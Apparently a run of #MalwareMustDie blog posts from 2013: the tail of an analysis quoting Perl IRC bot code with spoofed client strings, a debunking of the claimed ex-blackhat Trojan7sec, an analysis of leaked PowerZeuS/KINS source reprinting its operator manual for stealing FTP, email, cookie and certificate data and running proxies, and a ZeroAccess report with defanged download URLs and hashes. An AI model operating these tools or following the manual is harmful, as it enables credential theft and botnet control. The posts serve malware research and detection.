   "Will Smith","Freash Prince On IRC","Freash prince in bel air","Powered By PHPBB","mambo","ruy",
   "dj pulse","Powered By xeQt","Delux","2pac","Biggie","Fuck sadam","Allah","Im your god idiot","id",
   "Im to lame to read BitchX.doc","Boika","Diamonds","Jean claude Van dame","Arnold Schwartsneger",
   "Stig","Anothony","White Power","Just do it","vSmotor vs. Turbo","Nismo Skyline GT-R R34","MySquad",
   "Honda Civic Type-R","Maria Carrey","Terror Squad","I'm to lame to read BitchX.doc","w33d","hugo",
   "WinXP 1999 (C) Bill Gates","Microsoft windows xeQtxpress","xeQt vS Mrx Team","Apache httpd server",
   "arne","line","geir","terje","synne","linda","frode","my name?","teamrxPress","xeqters","asus power",
   "Crash Test Dummy","Madonna","vX power","Team Windows","Bill Gates","Bill Gatez","Thats my girl...",
   "Phunter","panter","Snaked","Hunted","Victums","PHPSH","mod_com_xQt","com_xeQter","com_team","assa",
   "Nokia, Connecting People...","BitchX","smoke and fly","com_xeQt_Performance","TeaMrx Performance",
   "xQt","Perlbot version vx9m0d v3","Googurl","Google lovers","xeQt_com","mrx_unit","com_asus","haist",
   "TeaMrx Crew","xQt vS TeaMrx","xeQt vS Mrx","Powered by TeaMrx","Powered by xQt","com_xQt_mrx","com_x",
   "com_teamrx","xeQt the way to go","Perl monks","perlhackers","perl genius","perl team","perl scanner",
   "San Francisco","New York Gangbang..","Team Norway","Team Europe","Team Germany","Team Work","jet lie");

#################
# Random Ports
#################
my @rports = ("6667");

my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
   "\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
   "\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
   "\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
   "\001Snak for Macintosh 4.9.8 English\001",
   "\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
   "\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
   "\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
   "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
   "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
   "\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
   "\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
   "\001ircN 8.00  -  he tries to tell me what I put inside of me  - \001",
   "\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
   "\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
   "\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
   "\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
   "\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
   "\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
   "\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
   "\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
   "\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
   "\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1キ9] : Keep it to yourself!\001",
   "\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
   "\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
   "\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
   "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
   "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");

[...]

# xeQt

#my $nick = "bq";
my $nick = $nickname[rand scalar @nickname];
my $realname = $xname[rand scalar @xname];
my $ircname = $xident[rand scalar @xident];
my $porta = $rports[rand scalar @rports];
my $xproc = $fakeps[rand scalar @fakeps];
my $Mrx = $Mrx[rand scalar @Mrx];
my $version = 'PowerBots (C) GohacK';

[...]

Moral of the story

1. Attacks that seems coming from AAA country might not really coming from AAA, please be careful about this.
2. What stated/written as Romanian Hacker/AntiSec, was actually has a taste of skids from OTHER territory to me, by analyzing some keywords that was modified in the source code of the attacker script, other attack tools, and after checking deeper to their IRC channel.
3. Hardening your web server and if you use old PHP... #PatchNow!

Kudoz The Team Work!

MalMouse is explaining in his blog about HOW WIDE the target of these attack:

Our friend @n300trg is suggesting how to have better view on China hacked web server's page: Our friend @botnet_hunter came into conclusion as I did & straightly expose the facts:

Samples

The file size was huge, can not upload to our mediafire.. so below is the alternative:

We are uploading the sample via FTP for Law Enforcement Evidence Collectiing and Security Research purpose only, we don't share the sample for the requester with te private address nor twitter account, so please prepare your FTP account and contact us via this post's comment section (not to be published!) with mentioning your real name, your entity and email address for the reply. Thank you in advance. Below is the archive snapshot:


#MalwareMustDie!

Saturday, October 12, 2013

Intelligence report. Beware: Trojan7sec, A wolf in sheep's skin

In reversing malware we have to deal with codes and its behavior, thinking backwards. connecting logic on the collected data to go figure how the malicious scheme works.This case is rather unusual, we reverse the social engineering malicious act. Which is way much complicated than reversing a malware code. The concept is the same but instead of codes we need to deal with facts, tracing one fact to another to find the real malicious concept behind it. The big difference between these two reversing concept is, dealing with malware code is easier since codes itself never lies (yes they are some manipulation or tricks but is all readable), but the malicious actor behind social engineering does. Here's the details:

Internet is media that was designed by UNIX engineer gentlemen with the good hope and heart to make people easier to communicate to each other around the globe. So some people think they can lie by online in internet, by faking some personalities, pretend to be good but actually doing bad activities in behind. These people maybe think "who knows?"
In malware fighting, to counter cyber crime, is important to cook our intelligence well, and we in #MalwareMustDie are good in nailing these liar / imposter cases. This is a one disclosure of the case.

For this investigation purpose we are pretending to accept the subject for the close intelligence activities, which the project is done now. Herewith we are Announcing and Clarify that the subject is NOT having anything related to #MalwareMustDie.

Trojan7sec

A lot of you have probably noticed a so called "security researcher" claiming to be an "ex-blackhat" with quite an impressive skillset and background. For those who have not read his post about his background, here is a link and here is a mirror of the post in case it is taken down. There is also a second post about himself link here and mirror here. We will be debunking these posts so the people who have fallen for his stories can tell the facts from fiction. 

Breaking it down


This is probably the most obvious lie to anyone with any security background at all. This claim has many holes, I will go through each.

Botnet Estimates vs Actual
Botmaster usually have a fairly accurate way to determine the number of bots, usually via unique id's that are assigned to each computer on infection. Because security experts very rarely gain access to the botnet command and control panel, the estimated number of bots is mostly calculated by monitoring the C&C servers and logging the unique ips over the course of a month. If you understand IPv4, you'll know that there are far less IPV4 addresses than there are compters, in an effort to combat this, ISPs use a method called "IP Pooling", this simply means instead of assigning each client with a permanent IP Address, the ISP will maintain a collection of IPs that will be assigned on the fly (when a client logs on to the internet, they will be given an IP at random). Because so many ISPs use IP pooling, over the course of a month far more IPs would be logged than there are infected computers, resulting in the total number of estimated infections being far more than the actual.

Large Botnets That Fit The Description
Bearing in mind that botnet estimates are usually way over, the biggest botnet ever is thought to be conficker with an estimated 10 - 15 million infections. Conficker did not produce much spam compared to some of the much smaller botnets, it was also not involved in banking fraud, keylogging or form-grabbing, so conficker is off the table. Now we are not going to bore you by going through every single botnet and showing you how it doesn't fit that claim, so we'll cut to the chase. No recorded botnet over 1 million bots fits all those characteristics.

Stating The Obvious
There is zero chance that a botnet of that size would go unnoticed, never-mind one of the people involved then giving up and going to twitter to talk about it, the fact he owns a gym and what country he lives in (people have gone to jail for far smaller mistakes). We'd also like to state that no one with a botnet of that size would bother with DDoS, the money made from launching denial of service attacks wouldn't even amount to 0.1% of the potential botnet revenue, it would also draw unnecessary attention.


At a first glance this is probably believable to even people with a security background, although we cannot fully disprove this, we can state why it is highly unlikely.

Malware Marketplace
Nearly all of the the high level malware marketplaces are Russian-speaking only, Trojan7Sec is living in England, he does not speak any Russian, which limits him to English speaking forums (We could count the number of banking trojans sold on English forums on 1 finger). Of course he could have someone who is Russian-speaking sell the product for him, but it's very unlikely.

Quality of Code
We'd estimate the average price of a professional bot with said features at about $2k - $5k, 10k would be a push and likely come from a very advanced programmer. Here is some code Trojan7sec posted on his blog a month after he wrote the above post: Link, Mirror. This code is very beginner and low quality, it is not the code you'd expect from someone who can code HTML inject at all, never-mind an expensive piece of malware.

Firstly you'll notice there is no error checking whatsoever, if any of the GetModuleHandle or GetProcAddress calls were to fail, the code would crash the browser on injection.
Secondly you'll notice this "while(Process32Next(handle, &ProcessInfo))", there is no call to Process32First which is generally what anyone with any programming background would do.
Lastly he doesn't close the thread handle, or the snapshot handle. It's hardly the end of the world, but it's something any competent programmer would know to do.

There's also the non standard and over the top use of the #define directive as well as the unnecessary use of strcpy on data that could have been initialized during compile. This is not the code you'd see from a professional malware coder selling code for $10k - $20k, this is the code you'd see from a member of hackforums selling a $100 bot.


This is probably the only true statement, It's clear Trojan7Sec is a pathological liar, however "believable" may be a slight overstatement (saying that, some of his stories did make it to big news sites).


Again, more of the same. This time the number is rounded up to an even more unlikely 20 million, We also learn that his botnets uses tor, msn and peer to peer to communicate. If you remember recent news, a botnet of around 400k computers started using tor and was the talk of the internet. Not only would a botnet of the size being talked about here be noticed, but would likely grind the entire tor network to a halt. It is agreed upon by a lot of researcher that peer to peer botnets are the most complex to develop, not the sort of thing you'd expect someone who only knows C++ at an entry level. It is also important to add, that using IM services like MSN to control bots is  ridiculous and the concept is limited to very small botnets and malware usually written by script-kiddies.

/r/netsec

If we do some digging on Trojan7sec, we can find a post on the netsec subreddit that he authored. Although it was deleted due to large amounts of lies, we can find the original comments here. The post is in the form of an IAMA (this means I Am A ... Ask Me Anything). Sadly, this post made it to news sites such as softpedia and welivesecurity, drawing attention away from real problem. 


(Note - If anyone can find a mirror of the full post, please leave a comment with the link or email us)

UPDATE: The REDDIT posts was restored back and accessible now:

Inspiration

The first thing we noticed is similarities between the original post and this, It is likely that Trojan7Sec got his inspiration for the "AMA" from the one written by the skynet botnet developer over a year ago. It's also interesting to note that if you look at the post date, despite being posted around the same time as the blog post, there is a 12 million difference in the alleged number of bots. 

Debunking The Comments

Just in case anyone doubts this is Trojan7sec's reddit post


This is interesting, anyone who works in the malware research industry knows that java malware is notoriously easy to detect. Not only has there never been any record of such a large botnet using java, it's a well known fact that there are not enough targetable OS X and Linux computers running java for it to be worth the loss of windows infections. This is the reason that pretty much all big botnets use native windows executables and are not cross-platform. 

Java malware is only really used by professional botmaster for targeting android devices. If you were to visit a beginner oriented hacking forum, such as hackforums, you would notice an abundance of java malware. This is due to java appealing to script-kiddies because it is easier to write malware with, it is also more suited to beginner botmaster because java application are usually ignored by antiviruses (this would be helpful to someone with little knowledge of advanced rootkit or antivirus evasion techniques).



This is the sort of thing someone pretending to be a mastermind cybercriminal would say, making 15-20k per an hour does not get you out of jail, if someone with Trojan7sec's alleged track record was arrested, it would likely result in the rest of his life in jail. We'll just throw it out there: 20k in 1 hour is a potential 175 million a year, It's up to you if you believe this person had that much earning potential, then gave it all up to sit on twitter insulting security researchers. 



After consulting with many people, blackhat and whitehat, we can conclude that no such board exist. Some private boards (nearly always Russian-speaking ones) do implement a signup fee of $50 - $1000, this fee is to deter low level law enforcement and security researcher who do not want to pay money to profile a forum. $20,000 is a lot of money, more than some people make in a year, a fee so large would deter just about everyone except for very rich cybercriminals, this would of course make the forum a prime target for the FBI (who do have $20,000 to spend on a forum account). 

We also mentioned earlier that Trojan7Sec is English, the most exclusive English hacking forum is darkode, which is so easy to get into that the forum user-base has more security researchers than legitimate members.


Further, the subject in this post explained, the person arrested in Israel and asked to help defend against cybercrime was Hamza Bendelladj, a botmaster and seller for spyspreader known online as BX1. Hamza was not the Zeus coder and had nothing to do with Zeus (other than using it). Anyone who had access to any private forums would know this fact, only script-kiddie oriented forums such as hackforums were spreading rumors that said otherwise. Furthermore, the real story of BX1 is actually as per described in below:

Deleted Tweets of Trojan7Sec

These are some now deleted tweet of Trojan7sec talking about the bot he spent 4 and a half years coding. Here is a list of features, you'll notice some features such as polymorphic encryption and bootkit, such features he is certainly not capable of coding and are likely taken from the carberp leak.

0-Days

Looking at trojan7sec's twitter, blog and reddit, we see the word "0-day" thrown around constantly. Contrary to popular belief, zero-day exploits are incredibly rare on the blackhat scene. Even advanced malware such as TDL and Rovnix uses patched exploits. Especially with the rise of bug bounty programs, if any malware were to use an 0-day exploit, it would be reported as soon as it was seen. 0-day exploits take a great amount of work and are patched very quickly, professional malware developers soon realized that using recently patched exploits was more effective (very few people update software regularly).

"0-Day" is a word that wannabe black-hats throw around to get attention, anyone with little knowledge of how the black-market works would think that 0-day exploits are far more common that they actually are, leading to the constant use of the term.

How and Why

A lot of you are probably wondering why we did this, It's simple. People like Trojan7Sec who make up stories then "become whitehat" draw attention away from the real issue. There are people working day and night doing their best to prevent and destroy malware, they get very little recognition and not a lot of pay. Along comes someone with what looks like a lot of experience and impressive background story, they then sit on twitter insulting hard working security researchers and antivirus companies, as well as feeding false and misleading information to amateur researcher who have been drawn into their web of lies. We have enough evidence to believe that Trojan7sec is very much still a blackhat and is likely only pretending to be whitehat for publicity. 

While writing this article we have consulted with researchers, blackhats, and programmers in order to make sure everything we say is as accurate as possible. For those of you who are actually whitehat, keep up the good work and remember:

"Thou Shalt Not Lie.. When the truth reveals, it will hurt you!"

Additional:

It looks like he is back on action in 2014, sensation? :-)


#MalwareMustDie. 

Thursday, October 10, 2013

MMD-0007-2013 - KINS? No! PowerZeuS, yes! Source Code for View & Download

Background

Finally announced publicly in social engineering media TODAY that the leaked source code of (updated) what we thought was KINS (/updated) was publicly exposed. We found out later on in the codes that there is no link to any current alive CnC with destination and/or pattern used by the known "realKINS", apart from some differences inside binary files. And (With thank's to "Invisible Kid" for suggestion to clarify this matter) found this toolkit is made based on known toolkit known as PowerLoader with an optional/additional ZeuS module/functions in a dll shape(indicated from Citadel stripped code actually), therefore, in "Ad Hoc", the "PowerZeus" looks like the "suitable naming" for this malware/toolkit itself.

Peeling the codes deeper, we found there is Bootkit codes from Carberp used; the loader which is leaving an old SpyEye traces (don't ask me why..); the form-grabber that are coming from the root of Zeus-based (found it in Citadel too); the gate web interface used was similar to what Pony/Zbot used with altogether tons of flaws in it.. it made me feel like seeing a re-union of Zeus family in one package. Our coder team also noticing the at least three different PHP coders were working in separated modules in separated time for the gate's codes.

Below is the simple grep traces of PoC of Builder code snips, explaining the modules used by the tookit, reference of Power Loader:

make.py(262): def build_project(project, project_out, params, is_x64 = False):
make.py(384):     build_project('softwaregrabber','softwaregrabber.dll', params)
make.py(402):     build_project('socks_server','socks5Server32.dll', params)
make.py(420):     build_project('socks_server','socks5Server64.dll', params, True)
make.py(438):     build_project('mod-killer','mod-killer.dll', params)
make.py(456):     build_project('dropper','dropper32.exe', params)
make.py(474):     build_project('dropper','dropper64.exe', params, True)
make.py(492):     build_project('clientdll','client32.dll', params)
make.py(510):     build_project('clientdll','client64.dll', params, True)    
make.py(542):     build_project('builder', outfile, params)

I just finished reading all codes when I added this note, these are a must-have for the AV industry and researchers to understand the recent concept of form-grabber, bot networking used, the bootkit, the gate's codes and its vulnerabilities (I count 3 SQLi, 2 PHP/Escape flaws & 1 Escalation User Privilege exploits in the gate's codes which can be used to, erm, "mitigate" this threat *smile*)

Many of download source was announced, some contains the PUP with unnecessary backdoors which can actually infect you. So I feel is important to have a clean download for the AV filtration support and research purpose. If I may add, for the press and media gentlemen, this malware is not new news, but the public disclosure code part for this toolkit is.

Malware Product Description (in package)

Below I pasted as per it is, the malware (toolkit)'s product description found in the source code, please take a look at this description well, specially at the explanation on mod-killer, module socket (designed for grabbing softwaregrabber of FTP , email , pop3 data and certificates & integrated with a common neural networking, is bot base module to the kernel ) and the installation parts. The exported admin certificates password also written clearly in plain text:

Product description:
itur1, url2, url3 - URLs on the gate dropper ( exe file).

In addition , there are two main slashes spare in case if your domain loknut .
This file should be progruzhat . It must be crypted .

delay - the delay otstuk

retry - interval core sampling bot.

buildid - the name dropper botnet .

encryption_key - encryption key.

url_server - admin Gate "B" , that is, admin core.

$ - Notifay .
! - A ban .
@ - Screenshots ( full-size ) .

macros :
% BOTID% - ID bot.
% opensocks% - automatic opening of the socks in the transition to H HRM .

captcha_server - interception of CAPTCHA . Works with AD. Leave as is.

After collecting the config files is issued shall be issued 3 - dropper.exe, 
bot32.dll, bot64.dll and just as you do is file softwaregrabber.dll,
which has already been assembled independently of the first three .

dropper.exe - dropper file ( 50 kb ), which pulls the core bot (2 cores , bot32.dll
 and bot64.dll). This file is crypted .

bot32.dll - kernel for 32-bit systems .....
: > kriptovat is not necessary . Avtokript memory . The modules are the basis of 
the bot and are responsible for the processes of injection and grabbing a browser .
bot64.dll - kernel for 64 -bit systems .....

softwaregrabber.dll - module port opening . Responsible for grabbing FTP \ Email \ 
pop3 \ Billing \ screen and check otstuk kernel modules. Kriptovat is not 
necessary . Avtokript memory .

The core of the bot. RULE OF COMMUNICATIONS AND DOWNLOADS . Pay special attention .

- Adding a file in the " Files" section. As jobs are added files bot32.dll, 
bot64.dll, softwaregrabber.dll and other modules , including third-party dll or exe files .
Name and version selected as desired. Bot communicates with the modules Zutick, 
Shylock, SpyEye, but without an open API ( optional) argument to leave empty.
Attention ! Communication with the module . First, load the kernel modules . 
In this case, the kernel modules should not be linked to anything . 
Next, load the module softwaregrabber.dll,
that should be associated with bot32.dll

- Give the job to the modules in the " job ." It should be noted key points : 
a) To select the kernel module loading mode " reusable "
Module softwaregrabber - " one-off " or " reusable " . 
b) Number of times (performance ) put a big number, eg 9999999 .

- Quest " written in the config ", " input commands manually " are available on
ly when you open API. Setting the "send logs " is available only for debug version,
which is done by request and in extreme cases. In this case, the installation 
logs dropper and obtaining rights go to the " logs " .

- Net \ dirty - a necessary attribute if you decide to download the bots in one hand.

- Updating the dll is on the circuit i +1 preserving the bot name in the files 
and assignments , if necessary update of sequence, and the scheme i, if the update
comes after the reboot .

- To update the statistics in the admin dropper , do not forget to add the task to CZK .

- The difference between the admin area "A" and "B" indicates the quality of 
your traffic. Cores bot ticking only after obtaining logs . In case
progruzhaetya kernel , say, Dedic , where there is no activity , the bot will 
appear in the admin "B" , but did not appear in the admin area "A".
You can always see the number of loaded cores bot in the " jobs " in the admin 
dropper . The difference in bad trafe may reach 90 %
we only show the balance of objective things.

The module mod-killer is designed to maintain the purity of your bots from 
third-party bots , unwanted software .
- Deleting Citadel (all), Zeus (all), SpyEye (all), IceIX (all), 
  Evolution (all) and their derivatives , Carberp ( exception - bootkit )
  Zutick, Lickat, Shylock, Gazavat (Sality).
- Delete a third-party malicious software, such as loaders , Rata , DDoS bots , based on heuristic analysis.
- Removal of unwanted software, such as click bots , bots spoofing issue , based on the heuristic analysis.
- Removal of the common bots even crypted form on the basis of signatures.
- Total integration with neural network bot. Analysis of unsigned software , processes, without windows, etc.

Installation Options :
Specify the arguments (arguments SpyEye in the admin core)
"77_uninstall;" - the removal of unwanted software , such as a boat- clickers , etc.
"77_replace_with = http://aa.ru/file.exe" ( if you have the software to progruz , 
but competitors will ship similar software on your bot ) swings on a new boat 
with RLS imunnitetom to deliteru - 77_uninstall
"Report;" - bug report in the admin area of the nucleus.
"Clean_zeus_based;" - delete all versions of popular signature-based bots .
The record of a line of several arguments. Each argument must end with "" .
Load module files , add to the value associated with the core bot32.dll

In order to use the module socks , do the transaction :
1 ) Find a server, it is desirable to Windows ( you can Dedicated Server with 
installed apache / nginx / xamp / denwer, in general, need a server
with installed php). Nix on Vine also supposed to work .
2) Fill socks_server folder on the server , we put all the 777 law.
3) Take gate.php link to the file on the server, remember .
4 ) Go to the admin panel dropper , add -ins and socks5Server32.dll socks5Server64.dll, 
in the arguments indicate the link from paragraph 3 ) .
Where to inject - explorer.exe.
5 ) Sox as IP: Port take in going to the link " your_server " / control.php, either from the log.txt
Sometimes we clean konnekshn we click in Kill Tasks. The terminal supports the 
socks fourth and fifth versions of standard rfc.
Authorization is not required. Volnovatsya about ports for bots do not need , 
they will take out of the gate .

WARNING ! The module must be connected to the core bot32.dll for socks5Server32.dll 
and bot64.dll c socks5Server64.dll respectively.
Attention ! In the tasks and files names must be exactly socks5Server32.dll and socks5Server64.dll
Auto open socks carried out on the macro / /% opensocks% in inzhekta .

The module is designed for grabbing softwaregrabber FTP , email , pop3 data and certificates.
The module is integrated with a common neural network is bot base module to the kernel .

Installation Options :
Specify the arguments (arguments SpyEye in the admin core)
"Grab_all;" - Rob everything - all FTP data that are recorded by a list of 
all email-i + contacts uchetka ,
Cookies IE and FF ( after sending the admin area as possible are removed ) , 
and certificates MY store ( exported to the admin certificates under the password "GCert")
"Grab_emails;" - grabbing only the email adresses .
"Grab_ftps;" - grabbing only FTP .
"Grab_certs;" - grabbing only certificates.
"Grab_sol;" - salt- grabbing cookies .
The record of a line of several arguments. Each argument must end with "" .
Load module files , add to the value associated with the core bot32.dll

Code Sharing Details

I wrapped up all of the codes into a 7zip after confirming the authenticity and be available for a clean share and you can download safely from here -->[MalwareMustDie MediaFire]
This source code is very important to filter the several evading techniques used by similar variants, with also planning a mitigation for the Bootkit implementation of the malware, I really hope AV industry will use this code well for their products implementation.

Before you download please see the size, MD5 hash, date and filename well as per mentioned in the below movie. In additional, there are countries that forbidding the owned of malware source, so if you want to view what's in the source code package, you don't have to downloaded it, but you can see it in the below movie I just took, to get the idea what the source actually contained:

The share limitation and rules

The password will be shared to the known security researchers and all anti-virus industry ONLY, please contact us by twitter's mention, or by email if you know how to reach me already. We share this information for the purpose to raise detection ratio of the threat and for the mitigation purpose. Any other purpose (even it sounds legitimate) will be rejected without notification or to be put into the lower priority. This is a recent and dangerous malware code, and evil malicious source code, a cyber crime tool, our sharing method in this subject is not a democracy nor discussion, please understand. So please present your self, your work and your purpose well.

Thank you for the good Crusader that leaked the source directly to us. God bless you.

References:

1. Technical Overview (Bootkit+Evade Wow64): KINS Source Code Leaked (Touch My Malware), link-->HERE
2. In depth analysis: Having a look on the KINS Toolkit (Xylibox), link-->HERE
3. Article: New Trojan #INTH3WILD: Is Cybercrime Ready to Crown a New “KINS”? (RSA Blog), link-->HERE

Kudoz friends in arms who read codez!

Luv you all! Stay secure! ( ^-^)v

The password is a tribute to a good young friend crusader with a very big heart!

#MalwareMustDie!

Monday, October 7, 2013

...And (again!) ZeroAccess/Sirefef is NOT Dead (yet!)

Is a straight to the point post, for ZeroAccess reference there was posted previously-
in --> HERE and--> HERE. Please bear for I will not include the previous exposed details.

Background

Again, do not believe on what you read without checking, like this AV marketing issue-->HERE
The post is without any technical analysis background specifically of the threat's sample on its malicious PoC, nor the share information of the verdicted subject's hashes. Not to mention the "huge intolerable research term miss" by mistaking ZeroKit(root/boot kit) as ZeroAccess..=sigh=
I wrote the above statement as a productive criticism to demand an improvement and a fix on current technical level of quality insurance form a technical post that coming from a "reliable" "big brand" in security industry which many people count, trust and generously pay in yearly basis for its licenses.
And additionally, in the country where I live and grow, if such vendor, if a maker made such mistake, it will be a press conference to make public apology to restore the trust of the market back, which in this case the appointed security maker is not. If in my company, the person in charge for those errornous "technical white paper" will be fired for sure!

This post is a PoC to counter the statement that says that "ZeroAccess was 50% neutralized" from a same maker appointed above. Is actually a lesson to all of us to be more criticized on such statement, specially to the one who has not publicly announce its blocking list, samples of what had been blocked, and so on. What we have found shows that ZeroAccess is out there active in distribution in same volume of P2P or domains, and improving its malicious act by using accompanied trojans. My question is simple: "What had been blocked???" < You all have your right judge it yourself after reading the below details.

Just when I hope to find alive PoC of ZeroAccess (or Sirefef), our crusader friend found it first and mentioned: VERY ALIVE:

Wasting no time, I went deep dive and surprised to the fact of what I found.


The Infection Source

The IP: 158.255.6 .116 is actively distributing ZeroAccess among other threats. URLQuery report is -->HERE Below is Virus Total's passive DNS report for the IP Address, link is--->HERE

2013-09-27 [34]fseggs2.aasdgaa.info
2013-10-07 [35]gtrfeds.artisanent.info
2013-09-28 [36]mgthnse.artisanent.info
2013-09-27 [37]mscderg.artisanent.info
2013-10-07 [38]rewdert.aasdgaa.info
2013-09-27 [39]rsdfcs1.artisanent.info
2013-09-25 [40]swdasc1.aasdgaa.info
2013-09-28 [41]ytedvh2.artisanent.info
2013-09-26 [42]zdegfsg.artisanent.info
2013-09-28 [43]ztgdbsw.artisanent.info
List of the downloaded URL:
6/38 2013-10-07 01:35:29 h00p://rewdert.aasdgaa.info/explorer.exe
7/38 2013-10-07 01:33:38 h00p://gtrfeds.artisanent.info/m.exe
2/39 2013-09-28 11:16:46 h00p://mgthnse.artisanent.info/
7/39 2013-09-28 11:16:52 h00p://ztgdbsw.artisanent.info/z.exe
5/39 2013-09-28 10:16:18 h00p://mgthnse.artisanent.info/m.exe
2/39 2013-09-28 10:16:11 h00p://ytedvh2.artisanent.info/zs.exe
10/39 2013-09-27 13:15:46 h00p://mscderg.artisanent.info/m.exe
2/39 2013-09-27 11:56:04 h00p://ytedvh2.artisanent.info/z.exe%5B/code%5D
5/39 2013-09-27 11:29:16 h00p://ytedvh2.artisanent.info/z.exe
3/39 2013-09-27 02:35:59 h00p://rsdfcs1.artisanent.info/m.exe
2/39 2013-09-26 11:41:46 h00p://fseggs2.aasdgaa.info/iexplorer.exe
3/39 2013-09-26 11:35:55 h00p://zdegfsg.artisanent.info/z.exe
1/39 2013-09-25 21:17:10 h00p://mscderg.artisanent.info/ 
Strong verdict of hashes:
15/48 2013-10-07 01:35:46  [57]67e11fab0bff36a256e003b00658e11e9ef68c07bd30279ba2dc5da0c8379fee
29/45 2013-10-07 01:34:41  [58]9dcbb64f365fdf6f80607d297d88134efa4a74ebadc3cc3c5effa9c4f8625937
25/48 2013-09-28 11:16:54  [59]b9e7adce23242e501ad04fd3c8dec6feeaddee9a7ef799879ffbaf9f6b67f594
4/48 2013-09-28 10:16:54   [60]6369f432a8383b3e802c2db0f69503f09bd047ddbe02d4fe971826c8ac29adfb
17/48 2013-09-27 13:16:32  [61]4c42befd1f6392339f6a4333642ad3a27ca16312616c83eb2586de63b275faae
16/48 2013-09-27 02:45:46  [62]c0b1fac70a57c7b23c4640d7049cbb91890d650bbfdf44e02143ba3e8c9038b5
8/47 2013-09-26 11:41:59   [63]dc5f3a223bf9a2ea3131a218472a3dfd2dfc9d628476e85376570d91c8ddcc4a
While OpenDNS recorded also the infection requests to the below domains:
huyftdr.artisanent.info
rewdert.aasdgaa.info
jihuyg1.aasdgaa.info
egthyrf.aasdgaa.info
hytgder.artisanent.info
ztgdbsw.artisanent.info
mgthnse.artisanent.info
rsdfcs1.artisanent.info
fretsdf.aasdgaa.info
grsjli1.aasdgaa.info
mscderg.artisanent.info
zdegfsg.artisanent.info
fseggs2.aasdgaa.info
gedsetu.aasdgaa.info
swdasc1.aasdgaa.info 
It is all served in HOSTKEY.RU
inetnum:        158.255.0.0 - 158.255.7.255
netname:        RU-HOSTKEY-20111114
descr:          Mir Telematiki Ltd
country:        RU
org:            ORG-MTL21-RIPE
admin-c:        PC7356-RIPE
tech-c:         PC7356-RIPE
tech-c:         PC7356-RIPE
status:         ALLOCATED PA
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      MTLM-MNT
mnt-routes:     MTLM-MNT
remarks:        abuse-mailbox: abuse@hostkey.com
source:         RIPE # Filtered

organisation:   ORG-MTL21-RIPE
org-name:       Mir Telematiki Ltd
org-type:       LIR
address:        Mir Telematiki Ltd Petr Chayanov Lva Tolstogo, 19/2 119021 Moscow RUSSIAN FEDERATION
phone:          +74992463587
fax-no:         +74992463587
mnt-ref:        MTLM-MNT
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
abuse-mailbox:  abuse@hostkey.ru
abuse-c:        HA2800-RIPE
source:         RIPE # Filtered

person:         Peter Chayanov
address:        Moscow, Russia
phone:          +7 499 246 3587
nic-hdl:        PC7356-RIPE
mnt-by:         MTLM-MNT
abuse-mailbox:  abuse@hostkey.ru
source:         RIPE # Filtered
Same actors controls these domains, non-hacked site:
Domain ID:D48479867-LRMS
Domain Name:ARTISANENT.INFO
Created On:24-Nov-2012 12:27:33 UTC
Last Updated On:24-May-2013 12:39:48 UTC
Expiration Date:24-Nov-2013 12:27:33 UTC
Sponsoring Registrar:GoDaddy.com, LLC (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Registrant ID:CR143925388
Registrant Name:wu liao
Registrant Organization:
Registrant Street1:xinyierbai 1-203
Registrant Street2:
Registrant Street3:
Registrant City:beijing
Registrant State/Province:beijing
Registrant Postal Code:10000
Registrant Country:CN
Registrant Phone:+86.13564859684
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:wuliaijod20d13@hotmail.com
Name Server:NS71.DOMAINCONTROL.COM
Name Server:NS72.DOMAINCONTROL.COM

Domain ID:D48479867-LRMS
Domain Name:ARTISANENT.INFO
Created On:24-Nov-2012 12:27:33 UTC
Last Updated On:24-May-2013 12:39:48 UTC
Expiration Date:24-Nov-2013 12:27:33 UTC
Sponsoring Registrar:GoDaddy.com, LLC (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Registrant ID:CR143925388
